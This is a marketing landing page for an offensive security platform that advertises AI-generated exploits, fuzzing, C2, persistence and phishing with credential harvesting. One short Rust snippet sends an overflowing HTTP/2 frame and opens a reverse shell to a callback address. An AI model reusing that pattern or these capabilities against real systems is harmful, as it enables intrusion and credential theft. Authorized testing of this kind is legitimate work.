ForgeStrike is designed for authorized security testing, research, and education only. Unauthorized use against systems you do not own or have permission to test is illegal.
v0.1-alpha — Now accepting access requests

Offense at
Machine Speed.

Rust core. AI-assisted exploitation. Kali-native.
The offensive security platform built for speed.

Request Access
Rust Core AI Research Kali Native eBPF Kernel
forgestrike@kali ~
$ _

Why ForgeStrike?

Current tools were built for a different era. ForgeStrike is built for today.

The Problem

  • Legacy frameworks use Ruby/Python — slow scans, high memory, decades-old architecture
  • Commercial tools are closed, expensive, and frequently leaked
  • New CVEs drop daily — manual PoC development cannot keep pace
  • Tools are fragmented: separate for recon, exploitation, C2, and reporting

The Solution

  • Rust core: 10-100x faster than Ruby/Python frameworks
  • AI reads arXiv papers and generates exploits automatically
  • Unified platform: recon through reporting in one tool
  • Works WITH your existing Kali toolkit, not against it

Three Pillars of Modern Offense

Each pillar is engineered from scratch. No wrappers. No compromises.

Rust Performance

Compiled, memory-safe, zero-overhead. No interpreter. No GC pauses. Every syscall counts.

847 modules loaded in 0.3s

AI-Assisted Exploitation

arXiv-to-PoC pipeline reads research papers and generates working exploits. Stay ahead of patches.

7 CVE papers analyzed per minute

Kali Ecosystem

Native bridge to Metasploit modules, Nmap, Burp Suite, Wireshark. Your existing toolkit, supercharged.

Load existing MSF modules natively

The Arsenal

Three core modules. Each purpose-built for modern offensive operations.

Fuzzing Engine

forgestrike fuzz

  • Protocol-aware fuzzing (HTTP/2, gRPC, WebSocket, custom protocols)
  • Coverage-guided mutation with crash triage
  • Auto-generates PoC from crash data
  • Rust-native: 10x throughput vs libFuzzer wrappers

arXiv-to-PoC Pipeline

forgestrike research

  • AI scans arxiv.org security papers daily
  • Extracts vulnerability methodology from academic papers
  • Generates exploit code from paper descriptions
  • Auto-tests against isolated lab environments
For Authorized Security Awareness Testing

Social Engineering Toolkit

forgestrike social

  • Phishing campaign builder (authorized testing only)
  • Credential harvesting with real-time dashboard
  • Pretexting template library
  • Security awareness scoring and reporting

Full Kill Chain Coverage

Every phase of the MITRE ATT&CK framework, mapped to ForgeStrike modules.

1
Recon
OSINT Engine
Subdomain Enum
Shodan/Censys
2
Weaponize
Payload Generator
Obfuscation Engine
3
Deliver
Social Eng Toolkit
Phishing Sim
4
Exploit
Exploit Framework
arXiv-to-PoC
Fuzzer
5
Install
Payload Deploy
Persistence Modules
6
C2
C2 Framework
Encrypted Channels
7
Objectives
Data Exfil Sim
Lateral Movement
Reporting

arXiv-to-PoC Pipeline

From academic paper to working exploit. Automated.

📄
arXiv Paper
AI monitors arxiv.org daily
🧠
AI Analysis
Extracts vulnerability methodology
💻
Exploit Code Gen
Generates Rust exploit code
🧪
Automated Testing
Tests against isolated lab
🎯
PoC Output
Ready-to-use proof of concept
EXAMPLE — LIVE PIPELINE OUTPUT
[paper] Novel RCE via HTTP/2 Frame Injection (arxiv:2603.14822)
[analysis] Identified memory corruption in frame parser, CVSS 9.8
[code]
use forgestrike::exploit::{Payload, Target};
use forgestrike::protocol::http2;

fn exploit_cve_2026_14822(target: &Target) -> Result<Payload> {
    let frame = http2::Frame::new()
        .set_type(0x0a) // CONTINUATION frame
        .set_length(0xFFFFFF) // overflow trigger
        .set_flags(http2::END_HEADERS);
    target.send_raw(frame.encode())?;
    Ok(Payload::shell_reverse(target.callback_addr()))
}
[test] Verified against Apache 2.4.59 in isolated lab
[output] PoC ready. Report generated. CVE candidate filed.

All social engineering features are designed for authorized security awareness testing. Campaigns include built-in scope controls and require explicit authorization tokens.

Security Awareness Testing

Measure human vulnerability. Improve organizational resilience.

Phishing Simulation

Multi-template campaign builder, click tracking, real-time dashboard.

Credential Harvesting

Cloned login pages (authorized targets only), auto-reporting to security team.

Pretexting Templates

Pre-built scenarios for common engagement types. Customizable per client.

Awareness Scoring

Per-employee risk scores, department rollups, trend tracking across campaigns.

Rust vs Legacy

Benchmarks from controlled lab environment. Real-world results vary.

Module Load Time 40x faster
ForgeStrike
0.3s
Legacy
12s
Network Scan (Class C) 21x faster
ForgeStrike
2.1s
Legacy
45s
Memory Usage (Idle) 49x lighter
ForgeStrike
18MB
Legacy
890MB
Payload Generation 24x faster
ForgeStrike
0.05s
Legacy
1.2s

See It In Action

Live scan output from a controlled lab environment.

forgestrike@kali — live scan
$ forgestrike scan --target lab.internal --deep --ai-assist

Request Access to ForgeStrike

Early access for qualified security professionals.

All Systems Operational | Last verified: | Typical response: 48 hours | Contact Support